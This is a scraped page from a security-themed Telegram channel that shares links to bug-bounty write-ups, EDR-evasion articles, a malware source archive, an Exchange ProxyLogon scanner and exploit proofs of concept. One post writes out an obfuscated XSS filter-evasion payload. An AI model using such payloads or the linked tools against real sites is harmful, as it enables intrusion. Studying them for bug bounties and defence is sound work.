HackerOne – Telegram
HackerOne
@HackerOne
11K subscribers
644 photos
31 videos
79 files
2.74K links
Community : @Sec0x01
@Bug0x
Download Telegram
About
Blog
Apps
Platform
Join
HackerOne
11K subscribers
HackerOne
Microsoft Is Seeing A Big Spike In Web Shell Use

https://ift.tt/3agwMZf
Ars Technica
Microsoft is seeing a big spike in Web shell use
Spike shows just how useful and hard to detect these simple programs can be.
2.76K viewsAdeL
HackerOne
https://dorks.faisalahmed.me/
dorks.faisalahmed.me
Bug Bounty Helper
2.7K viewsAmir Kiani
HackerOne
Watch "Practical RF Hardware and PCB Design Tips" on YouTube
https://youtu.be/_Hfzq1QES-Q
YouTube
Practical RF Hardware and PCB Design Tips - Phil's Lab #19
Some tips for when designing hardware and PCBs with simple RF sections and components. These concepts have aided me well when designing 4-layer embedded systems PCBs.

Topics: critical trace lengths, stackups, controlled impedance traces (microstrip, stripline)…
2.77K viewsAdeL
HackerOne
https://lucasteske.medium.com/reverse-engineering-cheap-chinese-vrcam-protocol-515c37a9c954
Medium
Reverse Engineering cheap chinese “VRCAM” protocol
That’s not the first time I get a Chinese hardware that has some proprietary protocol that does not follow a single standard. It’s funny…
2.61K viewsAdeL
HackerOne
#Scam
#Alert
2.4K viewsAmir Kiani, edited  
HackerOne
RCE on a Laravel Private Program

https://medium.com/@y.shahinzadeh/rce-on-a-laravel-private-program-2fb16cfb9f5c
Medium
RCE on a Laravel Private Program
The recent Laravel CVE enables remote attackers to exploit a RCE flaw in websites using Laravel. I’ve read the article about the…
2.77K viewsAmir Kiani
HackerOne
Endpoint Detection and Response: How Hackers Have Evolved

https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved
Optiv
Endpoint Detection and Response: How Hackers Have Evolved
This post identifies systemic endpoint detection and response issues and examines how attackers can bypass any EDR product.
2.64K viewsAdeL
HackerOne
EDR and Blending In: How Attackers Avoid Getting Caught

Part 2 of the series

https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught
2.86K viewsAdeL
HackerOne
#Offensive_security
Offensive Windows IPC Internals 2: RPC
https://csandker.io/2021/02/21/Offensive-Windows-IPC-2-RPC.html
Offensive Windows IPC Internals 1: Named Pipes
https://csandker.io/2021/01/10/Offensive-Windows-IPC-1-NamedPipes.html
3.13K viewsDmitriy
HackerOne
<a/href="j%0A%0Davanoscript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

XSS Payload
3K viewsAmir Kiani
HackerOne
@bugpoint
Good Channel for Public Bug Bounty Write-Up
7.05K viewsAmir Kiani, edited  
HackerOne
https://www.udemy.com/course/intro-to-bug-bounty-by-nahamsec/?couponCode=NAHOMIES
Udemy
Intro to Bug Bounty Hunting and Web Application Hacking
Insiders guide to ethical web hacking and bug bounty hunting with Ben Sadeghipour (@NahamSec)
3.22K viewsAdeL
HackerOne
https://github.com/RoganDawes/P4wnP1
GitHub
GitHub - RoganDawes/P4wnP1: P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry…
P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W. - RoganDawes/P4wnP1
3.11K viewsAmir Kiani
HackerOne
https://github.com/0x742/CVE-2020-0082-ExternalVibration
GitHub
GitHub - 0x742/CVE-2020-0082-ExternalVibration: This repo contains a proof-of-concept for 📱🚀👑, a deserialization vuln for local…
This repo contains a proof-of-concept for 📱🚀👑, a deserialization vuln for local escalation of privilege to system_server in Android 10. This proof-of-concept only activates a privileged intent. - ...
3.1K viewsAmir Kiani
HackerOne
https://ahgamut.github.io/c/2021/02/27/ape-cosmo/
3K viewsAdeL
HackerOne
https://damonmohammadbagher.github.io/
2.58K viewsAdeL
HackerOne
https://github.com/vxunderground/MalwareSourceCode/
GitHub
GitHub - vxunderground/MalwareSourceCode: Collection of malware source code for a variety of platforms in an array of different…
Collection of malware source code for a variety of platforms in an array of different programming languages. - vxunderground/MalwareSourceCode
3K viewsAmir Kiani
HackerOne
3.2K viewsAmir Kiani
HackerOne
https://github.com/microsoft/CSS-Exchange/tree/main/Security
GitHub
CSS-Exchange/Security at main · microsoft/CSS-Exchange
Exchange Server support tools and noscripts. Contribute to microsoft/CSS-Exchange development by creating an account on GitHub.
2.43K viewsAmir Kiani
HackerOne
dwisiswant0/proxylogscan - A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855) / ProxyLogon.
https://ift.tt/3cgBplO
2.6K viewsAdeL
HackerOne
Browser exploit via side channel attack: Researchers have discovered a new side-channel that they say can be reliably exploited to leak information from web browsers that could then be leveraged to track users even when JavaScript is completely disabled.
"This is a side-channel attack which doesn't require any JavaScript to run," the researchers said. "This means noscript blockers cannot stop it. The attacks work even if you strip out all of the fun parts of the web browsing experience. This makes it very difficult to prevent without modifying deep parts of the operating system."

https://arxiv.org/abs/2103.04952

https://thehackernews.com/2021/03/new-browser-attack-allows-tracking.html
2.31K viewsAdeL